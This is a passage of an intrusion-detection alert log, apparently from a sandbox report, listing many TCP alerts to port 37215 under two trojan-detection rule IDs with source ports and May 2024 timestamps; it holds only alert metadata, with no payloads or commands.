              SID:2829579
              Source Port:35212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431641
              SID:2829579
              Source Port:51104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329664
              SID:2829579
              Source Port:33758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578853
              SID:2835222
              Source Port:49804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395765
              SID:2835222
              Source Port:36530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545033
              SID:2829579
              Source Port:37790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797180
              SID:2835222
              Source Port:50068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232650
              SID:2829579
              Source Port:44646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361028
              SID:2835222
              Source Port:60090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486988
              SID:2829579
              Source Port:54470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075428
              SID:2829579
              Source Port:49308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059598
              SID:2829579
              Source Port:36252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127432
              SID:2835222
              Source Port:41872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433743
              SID:2835222
              Source Port:35192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457993
              SID:2835222
              Source Port:58086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232772
              SID:2835222
              Source Port:33310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.431397
              SID:2829579
              Source Port:41492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750464
              SID:2835222
              Source Port:54268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.825892
              SID:2835222
              Source Port:39672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.203018
              SID:2829579
              Source Port:49768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100664
              SID:2829579
              Source Port:48450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764415
              SID:2829579
              Source Port:52608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553566
              SID:2829579
              Source Port:55878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.362044
              SID:2835222
              Source Port:59144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988436
              SID:2835222
              Source Port:43132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204801
              SID:2829579
              Source Port:38586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150657
              SID:2835222
              Source Port:50950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234730
              SID:2835222
              Source Port:57724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573540
              SID:2829579
              Source Port:59928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482105
              SID:2829579
              Source Port:34224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371943
              SID:2829579
              Source Port:49542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.467824
              SID:2835222
              Source Port:59010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.593798
              SID:2835222
              Source Port:57688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063870
              SID:2829579
              Source Port:44802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395147
              SID:2835222
              Source Port:48072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.192992
              SID:2829579
              Source Port:46422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801847
              SID:2835222
              Source Port:45194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282238
              SID:2829579
              Source Port:55928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377328
              SID:2835222
              Source Port:50372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553312
              SID:2829579
              Source Port:55438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924109
              SID:2835222
              Source Port:40812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460417
              SID:2829579
              Source Port:33606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536713
              SID:2835222
              Source Port:39468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531888
              SID:2835222
              Source Port:49968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100656
              SID:2835222
              Source Port:35774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551825
              SID:2829579
              Source Port:44622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486144
              SID:2829579
              Source Port:35800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.602828
              SID:2829579
              Source Port:60132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504774
              SID:2829579
              Source Port:42990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575146
              SID:2829579
              Source Port:49152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341407
              SID:2829579
              Source Port:43564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396164
              SID:2829579
              Source Port:46586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871988
              SID:2835222
              Source Port:51988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432420
              SID:2829579
              Source Port:43338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.592065
              SID:2835222
              Source Port:59842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099880
              SID:2835222
              Source Port:59444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642167
              SID:2835222
              Source Port:60198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282897
              SID:2829579
              Source Port:36588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066243
              SID:2829579
              Source Port:58954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233761
              SID:2835222
              Source Port:44644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195084
              SID:2835222
              Source Port:53624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988764
              SID:2835222
              Source Port:53552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.527086
              SID:2835222
              Source Port:45404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070396
              SID:2829579
              Source Port:58542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118379
              SID:2829579
              Source Port:49818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189469
              SID:2835222
              Source Port:48222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640257
              SID:2835222
              Source Port:46874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477312
              SID:2829579
              Source Port:33672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245181
              SID:2829579
              Source Port:49660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624806
              SID:2829579
              Source Port:34316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343622
              SID:2835222
              Source Port:57744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431351
              SID:2829579
              Source Port:57068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725988
              SID:2829579
              Source Port:44636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449112
              SID:2835222
              Source Port:34058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.403010
              SID:2835222
              Source Port:45214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967227
              SID:2829579
              Source Port:56112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625220
              SID:2835222
              Source Port:44832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.696986
              SID:2835222
              Source Port:46618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378081
              SID:2835222
              Source Port:36724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724728
              SID:2829579
              Source Port:42976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538179
              SID:2829579
              Source Port:54648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055510
              SID:2835222
              Source Port:42614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.454495
              SID:2835222
              Source Port:49568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148912
              SID:2835222
              Source Port:43188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358384
              SID:2835222
              Source Port:44312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575251
              SID:2835222
              Source Port:56854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044850
              SID:2835222
              Source Port:41552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517931
              SID:2829579
              Source Port:60730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411895
              SID:2829579
              Source Port:51688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245785
              SID:2835222
              Source Port:40568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066318
              SID:2829579
              Source Port:52102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103292
              SID:2829579
              Source Port:52570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.067950
              SID:2835222
              Source Port:50506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055720
              SID:2835222
              Source Port:51846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520217
              SID:2829579
              Source Port:51252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624511
              SID:2835222
              Source Port:48652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801920
              SID:2835222
              Source Port:45784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406546
              SID:2835222
              Source Port:38848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724630
              SID:2829579
              Source Port:36746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048879
              SID:2835222
              Source Port:56048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193093
              SID:2835222
              Source Port:51988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.513546
              SID:2829579
              Source Port:52342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550532
              SID:2835222
              Source Port:52884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726398
              SID:2835222
              Source Port:48482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483667
              SID:2835222
              Source Port:56540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235296
              SID:2829579
              Source Port:56640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061800
              SID:2829579
              Source Port:43590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988518
              SID:2835222
              Source Port:54528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.080515
              SID:2829579
              Source Port:47610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.584986
              SID:2835222
              Source Port:41666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543667
              SID:2829579
              Source Port:58968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303285
              SID:2835222
              Source Port:59548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575088
              SID:2835222
              Source Port:41758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.491503
              SID:2835222
              Source Port:40554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486917
              SID:2829579
              Source Port:58090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975279
              SID:2835222
              Source Port:46810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802384
              SID:2829579
              Source Port:37302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.832424
              SID:2835222
              Source Port:59830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487576
              SID:2829579
              Source Port:46930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395495
              SID:2835222
              Source Port:44374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492126
              SID:2829579
              Source Port:59040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200751
              SID:2835222
              Source Port:42324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448796
              SID:2829579
              Source Port:49924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545710
              SID:2835222
              Source Port:55992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625238
              SID:2835222
              Source Port:49280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693427
              SID:2835222
              Source Port:52702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534879
              SID:2835222
              Source Port:55016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329456
              SID:2829579
              Source Port:53278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099519
              SID:2829579
              Source Port:49576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309267
              SID:2829579
              Source Port:47284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116848
              SID:2829579
              Source Port:40102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481681
              SID:2829579
              Source Port:51336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.828013
              SID:2835222
              Source Port:51026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400732
              SID:2835222
              Source Port:34984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539904
              SID:2835222
              Source Port:43538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536797
              SID:2835222
              Source Port:41838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549362
              SID:2835222
              Source Port:35686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186028
              SID:2835222
              Source Port:53176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368410
              SID:2835222
              Source Port:43210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098082
              SID:2835222
              Source Port:38088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098709
              SID:2829579
              Source Port:38486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118235
              SID:2835222
              Source Port:34720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098081
              SID:2829579
              Source Port:48896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483096
              SID:2835222
              Source Port:37648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.077635
              SID:2829579
              Source Port:41786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535775
              SID:2835222
              Source Port:53584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.584773
              SID:2835222
              Source Port:44912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.680991
              SID:2829579
              Source Port:51758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340856
              SID:2835222
              Source Port:47910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.803136
              SID:2835222
              Source Port:46026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280066
              SID:2835222
              Source Port:46110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280905
              SID:2829579
              Source Port:34424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574770
              SID:2835222
              Source Port:54078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814745
              SID:2829579
              Source Port:48314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.608671
              SID:2835222
              Source Port:54126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432339
              SID:2835222
              Source Port:40086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621761
              SID:2829579
              Source Port:53784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187071
              SID:2835222
              Source Port:38794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575743
              SID:2835222
              Source Port:40858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725535
              SID:2829579
              Source Port:35250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.346852
              SID:2835222
              Source Port:58204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979736
              SID:2835222
              Source Port:58024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871975
              SID:2829579
              Source Port:42484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200751
              SID:2829579
              Source Port:35702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102376
              SID:2835222
              Source Port:50278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279074
              SID:2829579
              Source Port:32784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661150
              SID:2829579
              Source Port:39282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967256
              SID:2835222
              Source Port:44950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340552
              SID:2835222
              Source Port:39618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506888
              SID:2829579
              Source Port:53974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481320
              SID:2835222
              Source Port:55290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868668
              SID:2829579
              Source Port:46592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347633
              SID:2835222
              Source Port:36344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623107
              SID:2835222
              Source Port:54780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535501
              SID:2829579
              Source Port:41410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671494
              SID:2829579
              Source Port:47394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279638
              SID:2835222
              Source Port:48206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481402
              SID:2829579
              Source Port:48170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371999
              SID:2829579
              Source Port:50564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.879411
              SID:2829579
              Source Port:37118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245852
              SID:2835222
              Source Port:38482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516295
              SID:2835222
              Source Port:47442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540716
              SID:2829579
              Source Port:39332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.676400
              SID:2835222
              Source Port:60106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153266
              SID:2829579
              Source Port:33988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802768
              SID:2829579
              Source Port:47524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199922
              SID:2829579
              Source Port:38540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280949
              SID:2829579
              Source Port:42294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334175
              SID:2829579
              Source Port:39192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060777
              SID:2829579
              Source Port:48844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.817765
              SID:2835222
              Source Port:57476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078437
              SID:2835222
              Source Port:55656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234132
              SID:2835222
              Source Port:39412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525155
              SID:2829579
              Source Port:49314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269330
              SID:2829579
              Source Port:36518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539284
              SID:2835222
              Source Port:48736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639904
              SID:2835222
              Source Port:48314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574812
              SID:2829579
              Source Port:36314
              Destination Port:37215
